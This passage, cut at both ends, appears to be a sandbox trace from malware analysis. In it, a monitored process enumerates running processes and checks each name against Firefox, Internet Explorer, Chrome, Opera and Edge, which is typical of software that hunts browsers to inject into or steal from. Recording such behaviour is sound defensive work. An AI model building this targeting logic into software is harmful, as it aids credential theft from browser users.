lpString2="firefox.exe") returned 1 [0176.940] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0176.940] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0176.940] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0176.940] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0176.940] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.941] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0176.941] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0176.941] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0176.941] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0176.941] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0176.941] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0176.941] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0176.941] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0176.941] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0176.941] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0176.942] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0176.942] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0176.942] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0176.942] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0176.942] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0176.942] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0176.942] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0176.942] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0176.943] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0176.943] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0176.943] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0176.943] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0176.943] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0176.943] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.943] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0176.943] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0176.943] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0176.943] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0176.943] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0176.943] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0176.944] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0176.944] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0176.944] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0176.944] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0176.944] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0176.944] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0176.945] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0176.945] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0176.945] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0176.945] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0176.945] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0176.945] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0176.945] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0176.945] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0176.945] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0176.945] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0176.945] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0176.945] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0176.946] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0176.946] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0176.946] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0176.946] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0176.946] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0176.946] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0176.946] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0176.946] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0176.946] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0176.946] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0176.946] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0176.946] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0176.947] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0176.947] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0176.947] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0176.947] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0176.947] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0176.947] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0176.948] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0176.948] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0176.948] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0176.948] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0176.948] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0176.948] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0176.948] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0176.948] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0176.948] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0176.948] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0176.948] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0176.948] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0176.949] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0176.949] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0176.949] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0176.949] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0176.949] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0176.949] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0176.949] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0176.949] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0176.949] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0176.949] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0176.949] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0176.949] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0176.950] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0176.950] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0176.950] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0176.950] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0176.950] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0176.950] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0176.951] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0176.951] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0176.951] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0176.951] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0176.951] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0176.951] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0176.951] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0176.951] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0176.951] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0176.951] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0176.951] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0176.951] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0176.952] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0176.952] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0176.952] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0176.952] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0176.952] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0176.952] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0176.952] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0176.952] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0176.952] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0176.952] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0176.952] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0176.952] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0176.953] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0176.953] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0176.953] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0176.953] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0176.953] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0176.953] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0176.953] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0176.954] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0176.954] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0176.954] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0176.954] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0176.954] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0176.954] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0176.954] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0176.954] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0176.954] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0176.954] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0176.954] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0176.955] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0176.955] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0176.955] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0176.955] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0176.955] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0176.955] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0176.955] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0176.955] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0176.955] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0176.955] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0176.955] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0176.955] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0176.956] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0176.956] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0176.956] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0176.956] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0176.956] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0176.956] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0176.956] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0176.956] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0176.956] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0176.957] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0176.957] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0176.957] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0176.957] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0176.957] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0176.957] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0176.957] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0176.957] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0176.957] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.958] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0176.958] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0176.958] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0176.958] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0176.958] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0176.958] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0176.958] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0176.958] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0176.958] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0176.958] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0176.958] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0176.958] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.959] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0176.959] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0176.959] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0176.959] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0176.959] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0176.959] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0176.959] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0176.960] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0176.960] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0176.960] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0176.960] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0176.960] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.960] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0176.960] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0176.960] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0176.960] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0176.960] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0176.960] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0176.961] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0176.961] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0176.961] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0176.961] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0176.961] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0176.961] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0176.961] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0176.961] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0176.961] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0176.961] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0176.961] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0176.961] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0176.962] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0176.962] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0176.962] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0176.962] lstrcmpiA 